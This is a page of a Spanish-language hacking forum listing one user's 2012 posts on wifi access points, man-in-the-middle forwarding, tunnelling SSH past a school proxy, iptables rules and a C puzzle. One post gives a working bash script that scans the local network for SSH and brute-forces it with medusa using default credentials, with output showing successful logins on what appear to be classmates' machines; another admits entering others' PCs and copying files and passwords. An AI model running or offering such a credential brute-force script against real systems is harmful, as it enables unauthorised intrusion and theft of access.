elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2 3 4
1  Seguridad Informática / Hacking / Re: problemas airbase-ng , no aparece ap en: 17 Agosto 2012, 18:06 pm
No todas las tarjetas de red wifi son compatibles para usarlas como AP. Otra alternativa al airbase es el hostapd
2  Seguridad Informática / Hacking / Re: Ayuda "man in the middle" !!! en: 1 Agosto 2012, 04:41 am
Pero tu que tutorial estas siguiendo? es muy sencillo todo esto... Lo que pasa es que el tráfico se queda en el pc del medio, prueba con este comando: sysctl -w net.ipv4.ip_forward=1
3  Seguridad Informática / Hacking / Re: ping que no llega a destino en: 24 Julio 2012, 13:49 pm
Depende de la configuración del firewall, puede estar activo y estar configurado de tal manera que si puedas hacer ping, pero con la ip pública accedes al router, y no al pc. Para poder acceder al pc de tu amigo debes redireccionar los puertos del router hacia el pc.

Supongo que antes era diferente porque el módem iba directamente enchufado al pc y la ip pública era a la vez la ip del pc.
4  Foros Generales / Foro Libre / Re: USB 3.0 ...?? en: 24 Julio 2012, 13:36 pm
lo del 10 veces mas rapido la verdad con las pruebas que hemos hecho no hablan asi, lo comprobamos copiando el mismo archivo en una unidad de 2.0 y la otra de 3.0 y es mas rapido , pero unas 3 o 4 veces, 10 ni borracho, hay test en internet que afirman lo que digo.

Lógico, no hay que confundir la velocidad teórica con la real, estoy seguro que en un momento dado, durante un corto periodo de tiempo la velocidad es 10 veces superior. Además una cosa es la velocidad que soporta el cable y otra la velocidad de lectura y escritura del disco duro.

Me parece bastante veloz que vaya unas 3 o 4 veces mas rápido que el 2.0
5  Seguridad Informática / Hacking / Re: Proxyweb ¿como hago un proxy en mi equipo? en: 10 Julio 2012, 17:28 pm
Pues yo lo que hacía para saltarme el proxy de clase era hacer un túnel ssh hacia un equipo de mi casa. La cuestión es que había un proxy en clase también y claro solo dejaba pasar las conexiones http y http(80 y 443) y utilicé el corkscrew para hacer pasar la conexiónes ssh(22) por el puerto https hasta mi casa donde tenia redirigido el puerto 443 de entrada al puerto 22...

No es un proxyweb pero los fines son los mismos.

Te dejo el tutorial que me solucionó las dudas a ver si te sirve:
http://bulma.net/body.phtml?nIdNoticia=2116
6  Seguridad Informática / Seguridad / Re: Volverme invisible a la red local en: 26 Junio 2012, 12:10 pm
Además esta regla del iptables

Código:
iptables -A INPUT -s 192.168.1.0/24 -j DROP

eliminaría las conexiones de la puerta de enlace hacia ti. Es decir, todas las respuestas del router de tus peticiones hacia internet las desecharías.

O me equivoco?

Si tienes razón pero con la respuesta de lipman se soluciona. Estaba tan encegado con hacerlo invisible que olvidé ese detalle.

Solo quería unas protecciones básicas tampoco quiero ser 100% indetectable, pero almenos si a un nmap normal y corriente. Bueno seguiré buscando cuando tenga un poco mas de tiempo.
7  Seguridad Informática / Seguridad / Volverme invisible a la red local en: 25 Junio 2012, 06:32 am
Hola buenos días!, mirad quería ser completamente invisible a los pcs que hay en mi red local.
Pensé que sería fácil! simplemente un drop a todos los pcs que me llamen desde la red local:
Código:
iptables -A INPUT -s 192.168.1.0/24 -j DROP

Con este comando consigo evitar los pings y bueno pues cualquier conexión hacia a mi pc desde la red local, pero si desde otro pc de mi red local hago un nmap -sP 192.168.1.* si me detecta este pc como host up.
Alguien sabría explicarme porque me detecta mi pc si he bloqueado todas las conexiones entrantes? La verdad me interesa mas el "porque me lo detecta" que el "como hacerlo indetectable" ya que el porque me llevará al como.

Gracias de antemano cracks!

8  Foros Generales / Foro Libre / Re: que es lo minimo que debe saber alguien para considerarse hacker? en: 22 Abril 2012, 18:08 pm
1º) Un hacker es aquella persona que quiere saber sobre informatica/electronica, y que usa sus conociemientos para aprender mas

2º) Como dijo "ohk" uno no puede autodenominarse hacker, ya que si no se convertiria en un lammer

3º) Algun momento llegare a ser hacker: Si siempre y cuando no te canses de seguir aprendiendo

4º) Pero los hacker no se introducen en otros ordenadores para robar archivos,...? No, es cirto que los hacker se meten en otros ordenadores, pero no para hacer daño, si no para aprender (si no serian lammers)

5º) Esta es mi opinion, si quieren la debatimos

Saludos!

1º si creo que lo cumplo, me gusta todo lo relacionado con la informática e intento aprender mas, aunque la electrónica la tenga poco tocada también me gusta.

2ºNo me denomino hacker, cuanto mas aprendo mas me doy cuenta de que se menos.

3º Lo intento sin darme cuenta, algunos me han llegado a llamar hacker por mi habilidad, pero no hagáis caso son lammers y no saben lo que dicen.

4º He descubierto vulnerabilidades en varias redes y pcs, he entrado en pcs, he husmeado un poco he copiado algún archivo y alguna contraseña (es imposible resistirse las primeras veces que consigues acceso a un pc) pero no he hecho daño aunque admito haber sido un poco lammer en mis comienzos, agua pasada, digamos que he madurado. XD

Bueno creo que cumplo los requisitos, bien!! soy un hacker! *****! la regla nº2... uffff ajajajjaja a
9  Seguridad Informática / Hacking / Descuido de alumnos de FP informatica en: 28 Marzo 2012, 12:57 pm
Creo que sobran palabras mostrando esto:

Código:
root@bt:~/Escritorio# ./script.sh |grep FOUND
ACCOUNT FOUND: [ssh] Host: 192.168.2.123 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.145 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.207 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.21 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.214 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.234 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.239 User: administrador Password: administrador [SUCCESS
ACCOUNT FOUND: [ssh] Host: 192.168.2.240 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.243 User: alumne Password: alumne [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.244 User: administrador Password: administrador [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.168.2.30 User: alumne Password: alumne [SUCCESS]
root@bt:~/Escritorio#

y aquí está lo que todos esperabais. Nada del otro mundo...
Código:
#!/bin/bash
ipRange=$(ifconfig | grep -A 1 -e eth -e wlan | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | grep -oiE -m 1 -e'([0-9]{1,3}+\.){2}[0-9]{1,3}')
ipNmap=$(echo $ipRange'.*')
nmap -p 22 -open $ipNmap | grep -oiE -e'([0-9]{1,3}+\.){3}[0-9]{1,3}' | uniq > /tmp/ip.txt
echo "alumne" > /tmp/Usuarios.txt
echo "administrador" >> /tmp/Usuarios.txt
echo "root" >> /tmp/Usuarios.txt
echo "alumne" > /tmp/Passwords.txt
echo "administrador" >> /tmp/Passwords.txt

ips=$(cat /tmp/ip.txt | sort)

for ip in $ips
do
    medusa -h $ip -U /tmp/Usuarios.txt -P /tmp/Passwords.txt -M ssh -L -f -b -v 6
done

10  Programación / Programación C/C++ / Re: estoy atascado, como formo palabras? en: 28 Marzo 2012, 09:57 am
No hay que enviar mensajes con el movil, hay que llamar, pero no pienso llamar, eso es una estafa.

Las palabras deben ser consecutivas, en plan sopa de letras.
Como tu dices las palabras que quiero formar tendrian que ser de 3 caracteres mínimo y máximo el tamaño de la linea ya que no habra una tabla de 20X20 tampoco... Ayer conseguí hacer las palabras horizontales de izquierda a derecha(que en una tabla de 10x10 me salian 450 palabras) y las comparé contra un diccionario de letras en español de 1 millon de palabras, la verdad es que en 1 o 2 segundos me sacaba todas las palabras que coincidian.

No soy especialmente experimentado en c, nunca he tocado c++ pero estoy por borrar el programa y volverlo a hacer quizá me plantee hacerlo en c++

Ya que estoy plantearé una duda, puede sonar a locura no se... yo lo que hago con el diccionario es meter las palabras del archivo en un array bidimensional de chars, los meto de 200.000 en 200.000 ya que no me dejaba hacer un array de 1 millon XD Ya sé que pareceré un ignorante xd pero alguien me podría explicar esto? hago bien en pasar los datos del archivo al array?

Sobre lo de formar palabras se puede decir que ya esta solucionado, quizá me precipite al escribir el post.

PD:cuando termine el programa lo subo prometido ;)
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines